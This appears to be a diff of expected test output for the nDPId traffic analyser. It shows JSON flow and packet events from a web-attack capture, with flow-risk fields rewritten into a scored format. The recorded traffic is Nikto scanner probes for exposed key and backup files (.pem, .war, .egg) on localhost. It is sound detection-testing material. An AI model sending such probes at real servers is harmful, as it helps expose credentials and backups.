 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
